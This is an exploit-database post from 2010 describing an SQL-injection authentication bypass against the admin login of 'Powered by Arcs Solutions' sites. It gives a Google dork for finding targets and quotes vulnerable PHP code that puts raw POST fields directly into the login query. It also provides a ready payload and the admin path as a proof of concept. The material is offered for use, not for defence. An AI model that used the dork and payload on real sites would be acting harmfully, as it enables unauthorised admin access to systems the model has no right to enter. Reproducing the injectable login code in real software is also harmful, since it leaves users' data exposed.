Powered by Arcs Solutions Auth Bypass Admin
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Powered by Arcs Solutions Auth Bypass Admin</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===========================================
Powered by Arcs Solutions Auth Bypass Admin
===========================================
========================================================================
| # Title : Powered by Arcs Solutions Auth Bypass Admin
| # Author : Spy-Q8
| # Date : 28/7/2010
| # email : spyxxq8@gmail.com
====================== Exploit By Spy-Q8 ===============================
# Dork : Powered by Arcs Solutions
# Special for: Inj3ct0r.com (Inj3ct0r Exploit Database)
# Exploit :
<?php
session_start();
include ("../include/manager_config.php");
if(isset($_POST['adminloginok']))
{
$usern=$_POST['usern'];
$pass=$_POST['pass'];
$loginquery = "SELECT * FROM ".TABLEPREFIX."_admin WHERE user_login =’$usern’ AND user_password = ‘$pass’";
$result = mysql_query($loginquery);
if (mysql_num_rows($result) >0 )
{
while($row=mysql_fetch_array($result))
{
$session_userlogin=$row['user_login'];
$session_userpass=$row['user_password'];
session_register("session_userlogin");
session_register("session_userpass");
echo"**************************.href=’index.php’< /******>";
}
?>
#############################
+] PoC: [path]/admin/index.php
User & Password: ‘ or ‘ 1=1
#############################
=================================================================================
[+] Greetz: Dr-LuLa Mr.MLL Diplomatic Hacker Q8 H4×0r nj-sys Mr.al7rbi
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-28]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13497
Leave a Reply